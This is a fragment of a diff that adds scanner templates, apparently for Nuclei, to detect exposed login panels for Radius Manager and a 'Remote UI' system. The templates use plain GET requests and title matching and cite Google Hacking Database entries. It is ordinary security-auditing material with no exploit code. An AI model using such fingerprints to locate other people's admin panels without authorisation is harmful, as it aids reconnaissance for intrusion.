matchers:
- type: word
words:
- 'PowerLogic ION'
- type: status
status:
- 200

24
exposed-panels/radius-manager.yaml Normal file
View File

@ -0,0 +1,24 @@
id: radius-manager-login
info:
name: Radius Manager Control Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6790
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin.php'
- '{{BaseURL}}/radiusmanager/user.php'
- '{{BaseURL}}/user.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Radius Manager - User Control Panel</title>'
- type: status
status:
- 200

21
exposed-panels/remote-ui-login.yaml Normal file
View File

@ -0,0 +1,21 @@
id: remote-ui-login
info:
name: Remote UI Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6815
requests:
- method: GET
path:
- '{{BaseURL}}/login.html'
matchers-condition: and
matchers:
- type: word
words:
- '<th>System Manager ID:</th>'
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More